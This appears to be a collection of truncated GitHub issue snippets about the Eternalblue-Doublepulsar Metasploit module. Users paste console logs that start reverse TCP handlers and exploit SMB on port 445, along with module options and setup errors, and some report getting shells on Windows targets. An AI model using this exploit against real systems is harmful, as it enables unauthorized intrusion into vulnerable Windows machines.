-
[*] Started reverse TCP handler on 192.168.43.80:4444
[*] 192.168.43.3:445 - Generating Eternalblue XML data
cp: cannot stat '/root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.Skeleto…
-
[*] Started reverse TCP handler on 192.168.43.214:4444
[*] 192.168.43.9:445 - Generating Eternalblue XML data
cp: cannot stat '/root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.Sk…
-
Hi,
i've use Eternalblue-Doublepulsar to exploit windows server 2008 R2 x64 and it works good, but it doesn't work for windows 2003 sp2 32bits the metasploit send me this error ::
msf exploit(etern…
-
When I copied these modules to /usr/share/metasploit-framework/modules/exploits/windows/smb, and then opened Metasploit, I got this error
> [-] WARNING! The following modules could not be loaded!
[-…
-
[*] Started reverse TCP handler on 192.168.1.150:4444
[*] 192.168.1.31:445 - Generating Eternalblue XML data
[*] 192.168.1.31:445 - Generating Doublepulsar XML data
[*] 192.168.1.31:445 - Generatin…
-
Module options (exploit/windows/smb/eternalblue_doublepulsar):
Name Current Setting Required Description
---- -----…
-
Hi it works on my kali, but gets problem on my OSX. I've changed the path in ruby file, but it still not work.
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_double…
-
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: Permission denied
![image](https://user-images.githubusercontent.com/107886543/174666027-eda13713-7c6b-4dd8-bc6…
-
I am running Nethunter on OnePlus One (bacon) with android Nougat and wine already installed
am getting this result :
[*] Started reverse TCP handler on 192.168.1.21:4444
[*] 192.168.1.23:445 - G…
-
i used this module with payload for bind_shell and it worked correctly and got me a shell, so my configurations are ok.
but when i set windows/x64/exec for payload, and run the module, it gives me th…